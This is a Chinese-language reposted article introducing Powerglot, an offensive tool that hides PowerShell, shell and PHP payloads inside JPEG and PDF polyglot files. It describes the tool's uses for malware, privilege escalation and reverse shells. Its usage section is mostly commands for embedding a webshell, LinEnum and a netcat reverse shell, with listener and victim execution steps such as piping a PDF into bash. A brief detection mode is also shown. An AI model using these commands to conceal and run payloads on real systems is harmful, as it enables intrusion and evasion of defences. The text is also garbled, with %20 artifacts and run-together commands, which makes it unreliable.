%20
Powerglot
%20Powerglot是一款强大的攻击性PowerShell脚本编码工具,基于Polyglot实现功能。从本质上讲,Powerglot%20%20是一种攻击性安全工具,适用于恶意软件、权限升级、横向入侵和反向shell。
Powerglot%20%20使用Polyglot%20%20来编码各种类型的脚本,包括攻击性的PowerShell%20%20脚本,并且不需要加载程序来执行有效负载。
在红队演习和其他进攻性任务中,伪装/隐藏有效负载通常是通过隐写术完成的,特别是在绕过网络层保护机制时。这也是PowerShell%20%20负载脚本开发的常用技术。最近的恶意软件和APT%20%20组织也选择了类似的方法来进行攻击,包括APT32、APT37、Ursnif、Powload、LightNeuron/Turla、Platinum%20%20APT、Waterbug/Turla、Lokibot、dukes%20%20(Ghost%20%20Recon)%20和Tianium。
Powerglot是基于Polyglots开发的多功能跨平台攻防工具。%20Powerglot%20%20允许开发人员在数字图像中隐藏脚本代码(PowerShell、shell%20%20脚本、PHP%20%20等)。该工具的开发人员目前正在添加新文件。格式支持。与其他攻击性工具和恶意软件不同,Powerglot%20%20不需要加载程序来执行隐藏在目标文件中的信息,从而最大限度地减少恶意程序在目标系统上的噪音。
Powerglot%20%20显然用于攻击/利用任务,但也适合蓝队研究人员。据我们所知,该工具是第一个通用且完整的工具,可帮助研究人员使用多语言搜索隐藏信息,从而帮助隐藏目标系统中的恶意软件或持续感染。
%20
功能介绍
%20将PowerShell、shell%20%20脚本、PHP%20%20和其他代码编码为图像文件,并支持在没有加载程序的情况下恢复/执行隐藏信息(有效负载)。%20PowerGlot%20%20可处理多种文件格式,但目前仅支持JPEG%20%20和PDF。目前正在开发对其他格式的支持。%20PowerGlot%20%20是一款完全开源的工具,可帮助研究人员检测恶意代码,尤其是使用Truepolyglot%20%20和stegoSploit%20%20等公共工具隐藏的信息。开发人员目前正在为PowerGlot%20%20添加对JPEG、PNG、GIF、BMP、ZIP、PDF、MP3%20和其他格式的支持。
工具安装
%20#%20git%20%20clone%20%20https://github.com/mindcrypt/powerglot#%20python3%20powerglot%20%20
工具使用参数
%20下面是如何使用Powerglot%20%20隐藏有效负载的演示示例。
样例一-将PowerShell/PHP/Shell脚本隐藏在一个JPEG图像中:
%20#%20python3%20powerglot.py%20%20-o%20%20Payload.ps1%20cat.jpg cat-hidden1.jpg# python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg# python3 powerglot.py -o shell .sh cat .jpg cat-hidden3.jpg
样例二-将一个提权Shell脚本隐藏在一个JPEG图像中:
# python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg# file cat-linenum.jpg (这是一个有效的JPEG 文件)# feh cat-lineum .jpg (图像在图像查看器中正确显示)# 脚本可以通过多种方式执行: a) cat cat-linenum | b) chmod +x cat-linenum.jpeg
样例三-将一个netcat反向信道隐藏在一个JPEG图像中:
#attacker# echo 'nc 127.0.0.1 4444' netcat. sh# python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg# nc -nvlp 4444#Victim# chmod +x cat-netcat.jpg | cat-netcat.jpg
样例四-PDF隐藏:
# 创建b64.sh你最喜欢的有效负载base64 Linenum.sh -w 0 b64.sh# 编辑b64.shecho 'base64 代码' -d | python3 powerglot -o b64.sh sample.pdf test.pdf# 文件test.pdf# xpdf test.pdf# 执行负载# cat test.pdf | bash 或chmod +x test.pdf ./test.pdf
样例五:
# python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg# 文件cat-ps.jpeg# feh cat-ps.jpeg# 有效负载执行(示例)# cat cat-ps.jpeg pwshPS /home/alfonso/PowerGlot/POWERSHELL | get-process;#hola # mundo#NPM(K) PM(M) WS(M) CPU ID SI 进程名称------ ----- ----- ------ - - -- -----------0 0,00 2,70 0 ,00 830 829 (sd-pam)0 0,00 0,00 0,00 75 0 acpi_ Thermal_pm0 0,00 4, 80 0,00 1217 854 代理0 0,00 1,70 0,00 748 748 Agetty0 0,00 40 ,77 1,01 1198 854 applet.py0 0,00 6,29 0,00 938 938 at-spi-bus-launcher0 0,00 6,61 5,64 953 938 at-spi2-registryd0 0,00 0,00 0,00 131 0 ata_sff0 0,00 1,77 0,00 8906 …78 原子0 0,00 218,81 585, 95 8908 …78 原子0 0,00 236,18 176,24 8947 …78 原子0 0,00 142,14 2,51 9009 …78 Atom 0 0,00 81,54 3,32 8932 …78 Atom --type=gpu- process --enable-features=SharedArrayBuffer -…0 0,00 39,44 0,01 8910 …78 原子--type=zygote --no-sandbox0 0,00 5,62 0,11 1370 …70 bash0 0,00 5,36 0,66 5278 …78 bash0 0,00 6,34 1,48 6778 …78 bash0 0,00 0,00 0,00 68 0 blkcg_punt_bio0 0,00 46,73 2,20 1199 854 blueman -applet0 0 ,00 50,25 1,64 1301 854 blueman-tray
在文件系统中检测隐藏代码
#python3 powerglot。 py -d ./--=[多语言检测] --=.........[可疑文件] -[ ./cat-end-extra2.jpg ].[可疑文件] - [ ./cat-end-extra3.jpg ][多语言Stegosploit][EOF Signature: */--]..................[可疑文件]-[ . /cat-end-extra1.jpg].
许可证协议
本项目的开发和开发根据GPL v3 开源许可协议发布。
项目地址
Powerglot:[https://github.com/mindcrypt/powerglot]
版权声明:本文由今日头条转载,如有侵犯您的版权,请联系本站编辑删除。